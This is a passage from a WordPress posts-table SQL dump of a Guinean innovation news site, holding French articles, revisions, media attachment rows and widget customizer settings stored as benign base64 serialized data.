ans.','','publish','open','open','','guineen-publie-formule-mathematique-met-fin-a-vielle-recherche-de-plus-de-2000-ans','','','2017-11-08 12:24:25','2017-11-08 12:24:25','',0,'https://guineeinnove.nimbasolution.com/?p=897',0,'post','',0),(898,1,'2017-11-08 12:03:08','2017-11-08 12:03:08','','JAMES PIERRE - Un nouveau Einstein en Afrique- Un Guinéen publie...[via torchbrowser.com]','','inherit','open','closed','','james-pierre-un-nouveau-einstein-en-afrique-un-guineen-publie-via-torchbrowser-com','','','2017-11-08 12:03:08','2017-11-08 12:03:08','',897,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/JAMES-PIERRE-Un-nouveau-Einstein-en-Afrique-Un-Guinéen-publie...via-torchbrowser.com_.mp4',0,'attachment','video/mp4',0),(899,1,'2017-11-08 12:22:20','2017-11-08 12:22:20','<p>Suivre la vidéo ci-dessous...</p>','Un Guinéen publie une formule mathématique qui met fin à une vielle recherche de plus de 2000 ans.','','inherit','closed','closed','','897-revision-v1','','','2017-11-08 12:22:20','2017-11-08 12:22:20','',897,'https://guineeinnove.nimbasolution.com/2017/11/08/897-revision-v1/',0,'revision','',0),(900,1,'2017-11-08 12:23:52','2017-11-08 12:23:52','','hawing','','inherit','open','closed','','hawing','','','2017-11-08 12:23:52','2017-11-08 12:23:52','',897,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/hawing.jpg',0,'attachment','image/jpeg',0),(901,1,'2017-11-08 12:24:25','2017-11-08 12:24:25','Suivre la vidéo ci-dessous...\r\n\r\n[video width=\"1280\" height=\"720\" mp4=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/JAMES-PIERRE-Un-nouveau-Einstein-en-Afrique-Un-Guinéen-publie...via-torchbrowser.com_.mp4\"][/video]','Un Guinéen publie une formule mathématique qui met fin à une vielle recherche de plus de 2000 ans.','','inherit','closed','closed','','897-revision-v1','','','2017-11-08 12:24:25','2017-11-08 12:24:25','',897,'https://guineeinnove.nimbasolution.com/2017/11/08/897-revision-v1/',0,'revision','',0),(909,1,'2017-11-20 16:42:58','2017-11-20 16:42:58','<a href=\"https://www.facebook.com/mamadoubhoye.bah.50\">Bhoye BAH</a>  est un jeune Guinéen âgé de 24 ans diplômé en sciences juridiques et politiques. Agro-entrepreneur, il se lance dans la production du Café Arabica avec sa marque ‘<strong>‘Café du Foutah’</strong>‘ à partir de semences Guinéennes.\r\n\r\n<img class=\"alignnone size-medium wp-image-910\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/eee-300x172.jpg\" alt=\"\" width=\"300\" height=\"172\" />\r\n\r\nPour plus de détail <a href=\"http://earthguinea.org/culture-du-cafe-un-jeune-guineen-se-demarque-dans-larabica-100-bio/\">EarthGuinea.org</a>  est allée à sa rencontre <a href=\"http://earthguinea.org/culture-du-cafe-un-jeune-guineen-se-demarque-dans-larabica-100-bio/\">en savoir plus...</a>','Bhoye Bah crée sa marque de café Arabica 100% Bio.','','publish','open','open','','bhoye-bah-cree-marque-de-cafe-arabica-100-bio','','','2017-11-20 16:45:30','2017-11-20 16:45:30','',0,'https://guineeinnove.nimbasolution.com/?p=909',0,'post','',0),(910,1,'2017-11-20 16:38:43','2017-11-20 16:38:43','','eee','','inherit','open','closed','','eee','','','2017-11-20 16:38:43','2017-11-20 16:38:43','',909,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/eee.jpg',0,'attachment','image/jpeg',0),(911,1,'2017-11-20 16:42:18','2017-11-20 16:42:18','','Bhoye bah','','inherit','open','closed','','bhoye-bah','','','2017-11-20 16:42:18','2017-11-20 16:42:18','',909,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/Bhoye-bah.jpg',0,'attachment','image/jpeg',0),(912,1,'2017-11-20 16:42:58','2017-11-20 16:42:58','<a href=\"https://www.facebook.com/mamadoubhoye.bah.50\">Bhoye BAH</a>  est un jeune Guinéen âgé de 24 ans diplômé en sciences juridiques et politiques. Agro-entrepreneur, il se lance dans la production du Café Arabica avec sa marque ‘<strong>‘Café du Foutah’</strong>‘ à partir de semences Guinéennes.\r\n\r\n<img class=\"alignnone size-medium wp-image-910\" src=\"https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/eee-300x172.jpg\" alt=\"\" width=\"300\" height=\"172\" />\r\n\r\nPour plus de détail <a href=\"http://earthguinea.org/culture-du-cafe-un-jeune-guineen-se-demarque-dans-larabica-100-bio/\">EarthGuinea.org</a>  est allée à sa rencontre <a href=\"http://earthguinea.org/culture-du-cafe-un-jeune-guineen-se-demarque-dans-larabica-100-bio/\">en savoir plus...</a>','Bhoye Bah crée sa marque de café Arabica 100% Bio.','','inherit','closed','closed','','909-revision-v1','','','2017-11-20 16:42:58','2017-11-20 16:42:58','',909,'https://guineeinnove.nimbasolution.com/2017/11/20/909-revision-v1/',0,'revision','',0),(913,1,'2017-11-20 16:44:12','2017-11-20 16:44:12','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-11-20 16:44:12','2017-11-20 16:44:12','',360,'https://guineeinnove.nimbasolution.com/2017/11/20/360-revision-v1/',0,'revision','',0),(914,1,'2017-11-20 16:45:24','2017-11-20 16:45:24','','Bhoye','','inherit','open','closed','','bhoye','','','2017-11-20 16:45:24','2017-11-20 16:45:24','',909,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/Bhoye.jpg',0,'attachment','image/jpeg',0),(918,1,'2017-11-21 08:12:19','2017-11-21 08:12:19','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-11-21 08:12:19','2017-11-21 08:12:19','',360,'https://guineeinnove.nimbasolution.com/2017/11/21/360-revision-v1/',0,'revision','',0),(919,1,'2017-11-21 08:14:19','2017-11-21 08:14:19','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-11-21 08:14:19','2017-11-21 08:14:19','',360,'https://guineeinnove.nimbasolution.com/2017/11/21/360-revision-v1/',0,'revision','',0),(920,1,'2017-11-21 08:15:12','2017-11-21 08:15:12','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-11-21 08:15:12','2017-11-21 08:15:12','',360,'https://guineeinnove.nimbasolution.com/2017/11/21/360-revision-v1/',0,'revision','',0),(921,1,'2017-11-22 10:36:49','2017-11-22 10:36:49','C\'est avec son agence patrimoniale intitulé \" Qui Veut Se Marier\" que cette femme met en relation des personnes désireuses d’être en couple pour le mariage.\r\n\r\nEn exercice depuis 2016, cette agence a plusieurs mariages à son actif ainsi que des mises en relation et des fiançailles en cour.\r\n\r\nPour bénéficier de leur service, les désireux s\'inscrivent sur une fiche, se décrivent et répondent à plusieurs questions notamment :\r\n\r\n1- Ton profil pour le mariage ?\r\n\r\n2- La religion de ton futur époux ou épouse ?\r\n\r\n3- Son statut ?…’’\r\n\r\nUne enquête de moralité est menée sur chaque désireux et désireuse. Après l’inscription, l’agence procède à l’ouverture d’une investigation sur la moralité des demandeurs. Après, l’agence procède à la recherche d’une correspondance suivant les mêmes procédures. Cela aboutie à la mise en relation des personnes de profil correspondant.','Kady Tounkara aide les Guinéens à trouver un partenaire pour mariage.','','publish','open','open','','kady-tounkara-aide-guineens-a-trouver-partenaire-mariage','','','2017-11-22 10:36:49','2017-11-22 10:36:49','',0,'https://guineeinnove.nimbasolution.com/?p=921',0,'post','',0),(922,1,'2017-11-22 10:36:32','2017-11-22 10:36:32','','kady-tounkara-1068x801-696x522','','inherit','open','closed','','kady-tounkara-1068x801-696x522','','','2017-11-22 10:36:32','2017-11-22 10:36:32','',921,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/kady-tounkara-1068x801-696x522.jpg',0,'attachment','image/jpeg',0),(923,1,'2017-11-22 10:36:49','2017-11-22 10:36:49','C\'est avec son agence patrimoniale intitulé \" Qui Veut Se Marier\" que cette femme met en relation des personnes désireuses d’être en couple pour le mariage.\r\n\r\nEn exercice depuis 2016, cette agence a plusieurs mariages à son actif ainsi que des mises en relation et des fiançailles en cour.\r\n\r\nPour bénéficier de leur service, les désireux s\'inscrivent sur une fiche, se décrivent et répondent à plusieurs questions notamment :\r\n\r\n1- Ton profil pour le mariage ?\r\n\r\n2- La religion de ton futur époux ou épouse ?\r\n\r\n3- Son statut ?…’’\r\n\r\nUne enquête de moralité est menée sur chaque désireux et désireuse. Après l’inscription, l’agence procède à l’ouverture d’une investigation sur la moralité des demandeurs. Après, l’agence procède à la recherche d’une correspondance suivant les mêmes procédures. Cela aboutie à la mise en relation des personnes de profil correspondant.','Kady Tounkara aide les Guinéens à trouver un partenaire pour mariage.','','inherit','closed','closed','','921-revision-v1','','','2017-11-22 10:36:49','2017-11-22 10:36:49','',921,'https://guineeinnove.nimbasolution.com/2017/11/22/921-revision-v1/',0,'revision','',0),(924,1,'2017-11-22 10:47:10','2017-11-22 10:47:10','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-11-22 10:47:10','2017-11-22 10:47:10','',360,'https://guineeinnove.nimbasolution.com/2017/11/22/360-revision-v1/',0,'revision','',0),(925,1,'2017-11-22 10:49:12','2017-11-22 10:49:12','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-11-22 10:49:12','2017-11-22 10:49:12','',360,'https://guineeinnove.nimbasolution.com/2017/11/22/360-revision-v1/',0,'revision','',0),(926,1,'2017-11-22 10:50:25','2017-11-22 10:50:25','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-11-22 10:50:25','2017-11-22 10:50:25','',360,'https://guineeinnove.nimbasolution.com/2017/11/22/360-revision-v1/',0,'revision','',0),(927,1,'2017-11-22 10:50:58','2017-11-22 10:50:58','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-11-22 10:50:58','2017-11-22 10:50:58','',360,'https://guineeinnove.nimbasolution.com/2017/11/22/360-revision-v1/',0,'revision','',0),(928,1,'2017-11-22 10:51:21','2017-11-22 10:51:21','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-11-22 10:51:21','2017-11-22 10:51:21','',360,'https://guineeinnove.nimbasolution.com/2017/11/22/360-revision-v1/',0,'revision','',0),(930,1,'2017-11-25 14:46:15','2017-11-25 14:46:15','C\'est grâce à une ONG Guinéenne intitulée \"<a href=\"http://www.change-guinea.org/\">Organisation pour le changement positif</a>\" que désormais, les Guinéens pourront avoir accès en détail aux informations relatives aux allocations Budgétaire à partir du site web: <a href=\"http://www.budgetouvertgn.org\">http://www.budgetouvertgn.org</a>\r\n\r\nA cet effet, notre équipe s\'est déplacée pour aller à la rencontre de <a href=\"https://www.facebook.com/ibrahimakalil.gueye\">Ibrahima Kalil Gueye</a>, le président de la dite ONG afin de connaitre les détails de ce projet.\r\n\r\n<strong>-Bonjour Mr Gueye:</strong>\r\n\r\nBonjour \"Guinée innovations\"\r\n\r\n<strong>-Pouvez vous nous décrire synthétiquement ce projet?</strong>\r\n\r\n\"Le projet <strong>Open Budget initiative </strong>est un projet qui s’inscrit dans le cadre de la transparence Budgétaire et l\'amélioration de la Gouvernance. Il consiste à analyser le budget national par secteur et par préfecture afin que la population est accès à toutes les informations liées aux dépenses, investissements, recettes, prévues dans le budget national. Ainsi, le citoyen a  à sa disposition un puissant outil de contrôle sur l\'action gouvernementale\".\r\n\r\n<strong>-Qu\'est ce qui vous à motiver à réaliser un tel projet?</strong>\r\n\r\n\"Constatant le déficit d\'accessibilité aux informations publiques  et voulant facilité la compréhension du contenue de la loi de finance par le citoyen pour mieux lutter contre les détournements de fonds publique sont les principales motivations.\"\r\n\r\n<strong>- Quels sont vos partenaires dans ce projet ?</strong>\r\n\r\n\"Nous avons plusieurs partenaires financiers que sont: le Département d\'Etat américain et l\'Ambassade de Grande Bretagne en République de Guinée. Aussi  des partenaires techniques que sont: \"<a href=\"https://www.facebook.com/ablogui/\">ABLOGUI</a>\", \"<a href=\"https://www.facebook.com/AfriyanGuin%C3%A9e-2091165687576353/\">AFRIYAN</a>\", \"<a href=\"https://www.facebook.com/agilinternationale.org/\">AGIL Internationale</a>\" et la \"<a href=\"https://www.facebook.com/La-Voix-Du-Peuple-Guin%C3%A9e-737636573077241/\">Voix du Peuple</a>\".\r\n\r\n<strong>- Quel est l\'étape suivante de ce projet ?</strong>\r\n\r\n\"Après le lancement officiel une campagne d\'information sera effectuée dans tout le pays, qui sera suivit par une formation de jeunes pour assurer la pérennisation du projet.\r\n\r\n<strong>- Le mot de la fin.</strong>\r\n\r\n\" Nous encourageons l\'ensemble des OSCs (organisation de la société civile) à se joindre à nous pour lutter contre la corruption en dénonçant les actes de corruption et les institutions corrompues. Nous avons un groupe facebook intitulé \"<a href=\"https://www.facebook.com/groups/207880299670774/\">Stop corruption Guinée</a>\" ou les gens ont la possibilité de poster des actes de corruptions dont il sont témoins ou victimes. Nous demandons en même temps à la presse et à tous les citoyens de participer à la consolidation du contrôle des actions publiques en partageant les contenues de cette plateforme.\"','Un site web qui détail les informations liées au budget en Guinée.','','publish','open','open','','__trashed-4','','','2017-11-27 11:36:37','2017-11-27 11:36:37','',0,'https://guineeinnove.nimbasolution.com/?p=930',0,'post','',0),(932,1,'2017-11-27 08:29:14','2017-11-27 08:29:14','C\'est grâce à une ONG Guinéenne intitulé \"OCP\" que désormais, les Guinéens pourront avoir accès en détail aux informations relatives au allocations Budgétaire à travers le site web http://www.budgetouvertgn.org\n\nA cet effet, notre équipe c\'est déplqcé pour aller à la rencontre de Ibrahima Kalil Gueye, le président de la dite ONG afin de connaitre les details de ce projet.\n\n&nbsp;','Une plateforme web pou','','inherit','closed','closed','','930-revision-v1','','','2017-11-27 08:29:14','2017-11-27 08:29:14','',930,'https://guineeinnove.nimbasolution.com/2017/11/27/930-revision-v1/',0,'revision','',0),(933,1,'2017-11-27 11:24:14','2017-11-27 11:24:14','','OCP','','inherit','open','closed','','received_1606639512733963-1','','','2017-11-27 11:24:42','2017-11-27 11:24:42','',930,'https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/received_1606639512733963-1.jpeg',0,'attachment','image/jpeg',0),(934,1,'2017-11-27 11:27:09','2017-11-27 11:27:09','C\'est grâce à une ONG Guinéenne intitulée \"<a href=\"http://www.change-guinea.org/\">Organisation pour le changement positif</a>\" que désormais, les Guinéens pourront avoir accès en détail aux informations relatives aux allocations Budgétaire à partir du site web: <a href=\"http://www.budgetouvertgn.org\">http://www.budgetouvertgn.org</a>\r\n\r\nA cet effet, notre équipe s\'est déplacée pour aller à la rencontre de <a href=\"https://www.facebook.com/ibrahimakalil.gueye\">Ibrahima Kalil Gueye</a>, le président de la dite ONG afin de connaitre les détails de ce projet.\r\n\r\n<strong>-Bonjour Mr Gueye:</strong>\r\n\r\nBonjour \"Guinée innovations\"\r\n\r\n<strong>-Pouvez vous nous décrire synthétiquement ce projet?</strong>\r\n\r\n\"Le projet <strong>Open Budget initiative </strong>est un projet qui s’inscrit dans le cadre de la transparence Budgétaire et l\'amélioration de la Gouvernance. Il consiste à analyser le budget national par secteur et par préfecture afin que la population est accès à toutes les informations liées aux dépenses, investissements, recettes, prévues dans le budget national. Ainsi, le citoyen a  à sa disposition un puissant outil de contrôle sur l\'action gouvernementale\".\r\n\r\n<strong>-Qu\'est ce qui vous à motiver à réaliser un tel projet?</strong>\r\n\r\n\"Constatant le déficit d\'accessibilité aux informations publiques  et voulant facilité la compréhension du contenue de la loi de finance par le citoyen pour mieux lutter contre les détournements de fonds publique sont les principales motivations.\"\r\n\r\n<strong>- Quels sont vos partenaires dans ce projet ?</strong>\r\n\r\n\"Nous avons plusieurs partenaires financiers que sont: le Département d\'Etat américain et l\'Ambassade de Grande Bretagne en République de Guinée. Aussi  des partenaires techniques que sont: \"<a href=\"https://www.facebook.com/ablogui/\">ABLOGUI</a>\", \"<a href=\"https://www.facebook.com/AfriyanGuin%C3%A9e-2091165687576353/\">AFRIYAN</a>\", \"<a href=\"https://www.facebook.com/agilinternationale.org/\">AGIL Internationale</a>\" et la \"<a href=\"https://www.facebook.com/La-Voix-Du-Peuple-Guin%C3%A9e-737636573077241/\">Voix du Peuple</a>\".\r\n\r\n<strong>- Quel est l\'étape suivante de ce projet ?</strong>\r\n\r\n\"Après le lancement officiel une campagne d\'information sera effectuée dans tout le pays, qui sera suivit par une formation de jeunes pour assurer la pérennisation du projet.\r\n\r\n<strong>- Le mot de la fin.</strong>\r\n\r\n\" Nous encourageons l\'ensemble des OSCs (organisation de la société civile) à se joindre à nous pour lutter contre la corruption en dénonçant les actes de corruption et les institutions corrompues. Nous avons un groupe facebook intitulé \"<a href=\"https://www.facebook.com/groups/207880299670774/\">Stop corruption Guinée</a>\" ou les gens ont la possibilité de poster des actes de corruptions dont il sont témoins ou victimes. Nous demandons en même temps à la presse et à tous les citoyens de participer à la consolidation du contrôle des actions publiques en partageant les contenues de cette plateformeSIT.\"','Un site web qui détail les informations liées au budget en Guinée.','','inherit','closed','closed','','930-revision-v1','','','2017-11-27 11:27:09','2017-11-27 11:27:09','',930,'https://guineeinnove.nimbasolution.com/2017/11/27/930-revision-v1/',0,'revision','',0),(935,1,'2017-11-27 11:32:39','2017-11-27 11:32:39','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-11-27 11:32:39','2017-11-27 11:32:39','',360,'https://guineeinnove.nimbasolution.com/2017/11/27/360-revision-v1/',0,'revision','',0),(936,1,'2017-11-27 11:35:23','2017-11-27 11:35:23','C\'est grâce à une ONG Guinéenne intitulée \"<a href=\"http://www.change-guinea.org/\">Organisation pour le changement positif</a>\" que désormais, les Guinéens pourront avoir accès en détail aux informations relatives aux allocations Budgétaire à partir du site web: <a href=\"http://www.budgetouvertgn.org\">http://www.budgetouvertgn.org</a>\r\n\r\nA cet effet, notre équipe s\'est déplacée pour aller à la rencontre de <a href=\"https://www.facebook.com/ibrahimakalil.gueye\">Ibrahima Kalil Gueye</a>, le président de la dite ONG afin de connaitre les détails de ce projet.\r\n\r\n<strong>-Bonjour Mr Gueye:</strong>\r\n\r\nBonjour \"Guinée innovations\"\r\n\r\n<strong>-Pouvez vous nous décrire synthétiquement ce projet?</strong>\r\n\r\n\"Le projet <strong>Open Budget initiative </strong>est un projet qui s’inscrit dans le cadre de la transparence Budgétaire et l\'amélioration de la Gouvernance. Il consiste à analyser le budget national par secteur et par préfecture afin que la population est accès à toutes les informations liées aux dépenses, investissements, recettes, prévues dans le budget national. Ainsi, le citoyen a  à sa disposition un puissant outil de contrôle sur l\'action gouvernementale\".\r\n\r\n<strong>-Qu\'est ce qui vous à motiver à réaliser un tel projet?</strong>\r\n\r\n\"Constatant le déficit d\'accessibilité aux informations publiques  et voulant facilité la compréhension du contenue de la loi de finance par le citoyen pour mieux lutter contre les détournements de fonds publique sont les principales motivations.\"\r\n\r\n<strong>- Quels sont vos partenaires dans ce projet ?</strong>\r\n\r\n\"Nous avons plusieurs partenaires financiers que sont: le Département d\'Etat américain et l\'Ambassade de Grande Bretagne en République de Guinée. Aussi  des partenaires techniques que sont: \"<a href=\"https://www.facebook.com/ablogui/\">ABLOGUI</a>\", \"<a href=\"https://www.facebook.com/AfriyanGuin%C3%A9e-2091165687576353/\">AFRIYAN</a>\", \"<a href=\"https://www.facebook.com/agilinternationale.org/\">AGIL Internationale</a>\" et la \"<a href=\"https://www.facebook.com/La-Voix-Du-Peuple-Guin%C3%A9e-737636573077241/\">Voix du Peuple</a>\".\r\n\r\n<strong>- Quel est l\'étape suivante de ce projet ?</strong>\r\n\r\n\"Après le lancement officiel une campagne d\'information sera effectuée dans tout le pays, qui sera suivit par une formation de jeunes pour assurer la pérennisation du projet.\r\n\r\n<strong>- Le mot de la fin.</strong>\r\n\r\n\" Nous encourageons l\'ensemble des OSCs (organisation de la société civile) à se joindre à nous pour lutter contre la corruption en dénonçant les actes de corruption et les institutions corrompues. Nous avons un groupe facebook intitulé \"<a href=\"https://www.facebook.com/groups/207880299670774/\">Stop corruption Guinée</a>\" ou les gens ont la possibilité de poster des actes de corruptions dont il sont témoins ou victimes. Nous demandons en même temps à la presse et à tous les citoyens de participer à la consolidation du contrôle des actions publiques en partageant les contenues de cette plateforme.\"','Un site web qui détail les informations liées au budget en Guinée.','','inherit','closed','closed','','930-revision-v1','','','2017-11-27 11:35:23','2017-11-27 11:35:23','',930,'https://guineeinnove.nimbasolution.com/2017/11/27/930-revision-v1/',0,'revision','',0),(937,1,'2017-12-04 08:56:33','0000-00-00 00:00:00','','Brouillon auto','','auto-draft','open','open','','','','','2017-12-04 08:56:33','0000-00-00 00:00:00','',0,'https://guineeinnove.nimbasolution.com/?p=937',0,'post','',0),(938,1,'2017-12-04 13:03:41','2017-12-04 13:03:41','{\n    \"sidebars_widgets[primary-sidebar]\": {\n        \"value\": [\n            \"facebooklikebox-3\"\n        ],\n        \"type\": \"option\",\n        \"user_id\": 1\n    },\n    \"widget_facebooklikebox[3]\": {\n        \"value\": {\n            \"encoded_serialized_instance\": \"YTozMTp7czo1OiJ0aXRsZSI7czowOiIiO3M6MTc6InBsdWdpbkRpc3BsYXlUeXBlIjtzOjExOiJwYWdlX3BsdWdpbiI7czoxMDoibGF5b3V0TW9kZSI7czo1OiJ4ZmJtbCI7czoxMzoicGx1Z2luUGFnZVVSTCI7czo0MzoiaHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL2d1aW5lZWlubm92YXRpb25zLyI7czoxNToicGFnZVBsdWdpbldpZHRoIjtzOjM6IjI1MCI7czoxNjoicGFnZVBsdWdpbkhlaWdodCI7czozOiIyNTAiO3M6MTQ6ImhpZGVDb3ZlclBob3RvIjtzOjQ6InRydWUiO3M6MTM6InNob3dQYWdlUG9zdHMiO3M6NDoidHJ1ZSI7czoxMjoic2hvd0ZhY2VQaWxlIjtzOjQ6InRydWUiO3M6NjoicGFnZUlEIjtzOjE1OiIxMTk2OTEyODgwNjQyNjQiO3M6NzoicGFnZVVSTCI7czoxMDM6Imh0dHA6Ly93d3cuZmFjZWJvb2suY29tL3BhZ2VzL1Zpdm9DaXRpY29tLUpvb21sYS1Xb3JkcHJlc3MtQmxvZ2dlci1EcnVwYWwtRE5OLUNvbW11bml0eS8xMTk2OTEyODgwNjQyNjQiO3M6MTA6ImNvbm5lY3Rpb24iO3M6MjoiMTAiO3M6NToid2lkdGgiO3M6MzoiMjkyIjtzOjY6ImhlaWdodCI7czozOiIyNTUiO3M6Nzoic3RyZWFtcyI7czozOiJ5ZXMiO3M6MTE6ImNvbG9yU2NoZW1lIjtzOjU6ImxpZ2h0IjtzOjExOiJib3JkZXJDb2xvciI7czo2OiJBQUFBQUEiO3M6OToic2hvd0ZhY2VzIjtzOjM6InllcyI7czo2OiJoZWFkZXIiO3M6MzoieWVzIjtzOjE5OiJmYmxpa2VfYnV0dG9uX3N0eWxlIjtzOjg6InN0YW5kYXJkIjtzOjI5OiJmYmxpa2VfYnV0dG9uX3ZlcmJfdG9fZGlzcGxheSI7czo5OiJyZWNvbW1lbmQiO3M6MTk6ImZibGlrZV9idXR0b25fd2lkdGgiO3M6MzoiMjkyIjtzOjI1OiJmYmxpa2VfYnV0dG9uX2NvbG9yU2NoZW1lIjtzOjU6ImxpZ2h0IjtzOjIzOiJmYmxpa2VfYnV0dG9uX3Nob3dGYWNlcyI7czozOiJ5ZXMiO3M6MTg6ImZibGlrZV9idXR0b25fZm9udCI7czo1OiJhcmlhbCI7czoyNDoiZW5hYmxlT3RoZXJTb2NpYWxCdXR0b25zIjtzOjI6Im5vIjtzOjIwOiJhZGRUaGlzVmVydGljYWxTdHlsZSI7czoxOiIxIjtzOjEyOiJhZGRUaGlzUHViSWQiO3M6MDoiIjtzOjIwOiJlbmFibGVUd2l0dGVyQnV0dG9ucyI7czoyOiJubyI7czoxNToidHdpdHRlclVzZXJuYW1lIjtzOjA6IiI7czoxODoidHdpdHRlckJ1dHRvblN0eWxlIjtzOjM6IjEyNyI7fQ==\",\n            \"title\": \"\",\n            \"is_widget_customizer_js_value\": true,\n            \"instance_hash_key\": \"9885b4d48cb8d4ec64de6c297d45faaf\"\n        },\n        \"type\": \"option\",\n        \"user_id\": 1\n    }\n}','','','trash','closed','closed','','1326727a-cae8-4686-b3cd-6007c2d04dbc','','','2017-12-04 13:03:41','2017-12-04 13:03:41','',0,'https://guineeinnove.nimbasolution.com/?p=938',0,'customize_changeset','',0),(939,1,'2017-12-04 13:05:06','2017-12-04 13:05:06','{\n    \"sidebars_widgets[primary-sidebar]\": {\n        \"value\": [\n            \"facebooklikebox-3\",\n            \"do-etfw-3\"\n        ],\n        \"type\": \"option\",\n        \"user_id\": 1\n    },\n    \"widget_do-etfw[3]\": {\n        \"value\": {\n            \"encoded_serialized_instance\": \"YToxMDp7czo1OiJ0aXRsZSI7czoyMDoiRm9sbG93IG1lIG9uIFR3aXR0ZXIiO3M6MjE6InR3aXR0ZXJfdGltZWxpbmVfdHlwZSI7czo4OiJ1c2VybmFtZSI7czoyMzoidHdpdHRlcl93aWRnZXRfdXNlcm5hbWUiO3M6MTQ6IkduX2lubm92YXRpb25zIjtzOjE3OiJ0d2l0dGVyX3dpZGdldF9pZCI7czowOiIiO3M6MjA6InR3aXR0ZXJfd2lkZ2V0X3dpZHRoIjtzOjA6IiI7czoyMToidHdpdHRlcl93aWRnZXRfaGVpZ2h0IjtzOjM6IjQwMCI7czoyNjoidHdpdHRlcl93aWRnZXRfdHdlZXRfbGltaXQiO3M6MDoiIjtzOjIwOiJ0d2l0dGVyX3dpZGdldF90aGVtZSI7czo1OiJsaWdodCI7czoyNToidHdpdHRlcl93aWRnZXRfbGlua19jb2xvciI7czo3OiIjM2I5NGQ5IjtzOjI3OiJ0d2l0dGVyX3dpZGdldF9ib3JkZXJfY29sb3IiO3M6NzoiI2Y1ZjVmNSI7fQ==\",\n            \"title\": \"Follow me on Twitter\",\n            \"is_widget_customizer_js_value\": true,\n            \"instance_hash_key\": \"048c1defc2405b3669cb6cbaa13cb3a0\"\n        },\n        \"type\": \"option\",\n        \"user_id\": 1\n    }\n}','','','trash','closed','closed','','6649d54c-31cc-4ac1-853d-fdb66cfd2d9d','','','2017-12-04 13:05:06','2017-12-04 13:05:06','',0,'https://guineeinnove.nimbasolution.com/?p=939',0,'customize_changeset','',0),(940,1,'2017-12-04 13:06:31','2017-12-04 13:06:31','{\n    \"widget_do-etfw[3]\": {\n        \"value\": {\n            \"encoded_serialized_instance\": 